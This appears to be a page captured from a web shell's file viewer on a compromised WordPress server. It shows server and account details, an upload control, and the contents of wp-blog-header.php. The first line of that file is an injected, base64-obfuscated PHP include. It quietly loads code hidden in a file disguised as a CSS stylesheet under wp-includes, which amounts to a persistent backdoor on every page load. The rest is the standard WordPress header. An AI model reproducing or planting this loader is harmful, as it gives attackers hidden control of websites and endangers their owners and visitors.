HEX
Server: Apache
System: Linux 67-231-244-150.cprapid.com 4.18.0-513.18.1.el8_9.x86_64 #1 SMP Thu Feb 22 03:02:37 EST 2024 x86_64
User: accionacapital (1028)
PHP: 8.1.33
Disabled: exec,passthru,shell_exec,system
Upload Files
File: /home/accionacapital/public_html/wp-blog-header.php
<?php @include base64_decode("L2hvbWUvYWNjaW9uYWNhcGl0YWwvcHVibGljX2h0bWwvd3AtaW5jbHVkZXMvYmxvY2tzL2NvdmVyL3N0eWxlLXJlbC5jc3M=");?><?php
/**
 * Loads the WordPress environment and template.
 *
 * @package WordPress
 */

if ( ! isset( $wp_did_header ) ) {

	$wp_did_header = true;

	// Load the WordPress library.
	require_once __DIR__ . '/wp-load.php';

	// Set up the WordPress query.
	wp();

	// Load the theme template.
	require_once ABSPATH . WPINC . '/template-loader.php';

}